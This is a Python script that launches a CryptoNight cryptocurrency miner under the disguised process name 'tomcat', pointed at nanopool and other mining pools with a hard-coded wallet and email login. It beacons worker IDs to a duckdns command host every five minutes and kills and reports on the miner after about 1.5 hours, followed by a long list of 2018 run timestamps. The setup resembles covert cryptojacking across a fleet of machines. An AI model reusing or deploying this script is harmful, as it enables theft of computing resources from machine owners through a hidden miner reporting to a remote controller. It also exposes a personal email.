import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:09:03.602106
#2018-02-17 16:55:06.380875
#2018-02-17 18:43:06.048525
#2018-02-17 20:31:05.541404
#2018-02-17 22:16:07.368902
#2018-02-18 00:00:03.561016
#2018-02-18 01:51:01.418804
#2018-02-18 03:38:03.961206
#2018-02-18 05:24:07.206175
#2018-02-18 07:16:06.278683
#2018-02-18 09:03:05.903320
#2018-02-18 10:50:07.873566
#2018-02-18 12:38:06.325469
#2018-02-18 14:24:07.788589
#2018-02-18 16:15:08.031199
#2018-02-18 18:04:06.285096
#2018-02-18 19:51:01.939228
#2018-02-18 21:39:06.265669
#2018-02-18 23:27:03.689925
#2018-02-19 01:14:06.453587
#2018-02-19 03:01:05.539532
#2018-02-19 04:48:07.921082
#2018-02-19 06:34:06.300924
#2018-02-19 08:23:07.288807
#2018-02-19 10:13:01.962270
#2018-02-19 12:00:04.765156
#2018-02-19 13:48:01.827164
#2018-02-19 15:36:07.033115
#2018-02-19 17:24:07.187361
#2018-02-19 19:13:07.273998
#2018-02-19 21:02:07.856682
#2018-02-19 22:50:09.007809
#2018-02-20 00:33:07.202860
#2018-02-20 02:22:07.378583
#2018-02-20 04:12:03.997587
#2018-02-20 05:55:07.587628
#2018-02-20 07:41:06.950704
#2018-02-20 09:26:04.492723
#2018-02-20 11:10:02.062445
#2018-02-20 12:56:08.620481
#2018-02-20 14:42:05.268685
#2018-02-20 16:26:09.322495
#2018-02-20 18:14:05.610459
#2018-02-20 20:06:02.978728
#2018-02-20 21:52:08.736090
#2018-02-20 23:35:08.828787
#2018-02-21 01:20:08.744868
#2018-02-21 03:08:06.082598
#2018-02-21 04:58:01.901017
#2018-02-21 06:46:04.163670
#2018-02-21 08:33:01.264298
#2018-02-21 10:18:06.769273
#2018-02-21 12:07:08.951771
#2018-02-21 13:55:01.460815
#2018-02-21 15:40:01.303230
#2018-02-21 17:31:08.066879
#2018-02-21 19:17:11.876208
#2018-02-21 21:05:05.746870
#2018-02-21 22:52:03.518984
#2018-02-22 00:41:03.940879
#2018-02-22 02:27:03.888033
#2018-02-22 04:14:05.160973
#2018-02-22 05:59:03.784189
#2018-02-22 07:45:08.629540
#2018-02-22 09:35:07.484407
#2018-02-22 11:20:04.112408
#2018-02-22 13:06:01.559323
#2018-02-22 14:54:07.141005
#2018-02-22 16:40:03.631875
#2018-02-22 18:25:10.747533
#2018-02-22 20:18:04.720483
#2018-02-22 22:04:07.409569
#2018-02-22 23:51:01.595016
#2018-02-23 01:38:06.611765
#2018-02-23 03:24:01.947530
#2018-02-23 05:10:07.432825
#2018-02-23 06:55:08.789087
#2018-02-23 08:46:08.005734
#2018-02-23 11:04:09.915860
#2018-02-23 12:59:06.481010
#2018-02-23 14:45:12.233460
#2018-02-23 16:34:03.845587
#2018-02-23 18:20:04.386089
#2018-02-23 20:06:08.104548
#2018-02-23 21:52:01.489748
#2018-02-23 23:43:03.613583
#2018-02-24 01:33:05.668759
#2018-02-24 04:11:06.822524
#2018-02-24 05:59:07.086835
#2018-02-24 07:47:05.261579
#2018-02-24 09:31:03.916233
#2018-02-24 11:26:07.439955
#2018-02-24 13:15:01.544708
#2018-02-24 15:06:07.633480
#2018-02-24 16:55:06.344696
#2018-02-24 18:44:07.126360
#2018-02-24 20:36:01.294927
#2018-02-24 22:40:06.068731
#2018-02-25 01:47:02.077956
#2018-02-25 05:22:07.276960
#2018-02-25 11:34:06.589506